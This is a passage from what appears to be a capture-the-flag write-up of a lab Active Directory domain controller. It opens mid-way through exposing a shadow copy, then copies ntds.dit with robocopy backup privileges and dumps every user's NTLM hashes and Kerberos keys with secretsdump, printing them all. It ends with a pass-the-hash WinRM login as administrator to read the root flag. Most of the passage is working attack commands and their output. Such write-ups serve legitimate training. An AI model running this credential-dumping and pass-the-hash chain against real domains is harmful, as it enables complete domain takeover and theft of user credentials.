- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %mydrive% E:
-> %mydrive% = {2b911045-4358-4439-aca7-8e4576fdf6bf}
The shadow copy was successfully exposed as E:\.
->now the copy is made and exposed at E:\ so lets access it and download the ntds.dat file
we can't just download it directly we have to use robocopy which uses the SeBackupPrivilelges to bypass the system lock for NTDS
*Evil-WinRM* PS C:\Windows\Temp> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Thursday, June 4, 2026 12:16:46 PM
Source : E:\Windows\ntds\
Dest : C:\Windows\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit
< SNIP>
100%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 118,987,347 Bytes/sec.
Speed : 6,808.511 MegaBytes/min.
Ended : Thursday, June 4, 2026 12:16:46 PMand also dump it with secretsdump
[★]$ secretsdump.py -ntds ntds.dit -system SYSTEM.save LOCAL
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:9c76997b6cea7695224013678d9f5bcc:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:44daf1b1becfe1cc191e96620f645100e0f96b26057be5f6b0d6d6118f298372
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:23a7b7cace0781126134ecc2ab8ad89d
baby.vl\Caroline.Robinson:des-cbc-md5:ef2c62d98323379e
[*] Cleaning up... so lets try that hash with WINRM
[★]$ nxc winrm baby.vl -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)so lets grab the flag
[★]$ nxc winrm baby.vl -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d -X 'type C:\Users\Administrator\Desktop\root.txt'
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)
WINRM 10.129.234.71 5985 BABYDC [+] Executed command (shell type: powershell)
WINRM 10.129.234.71 5985 BABYDC 06fb0c1b0a81a72975ba8012f89e2e20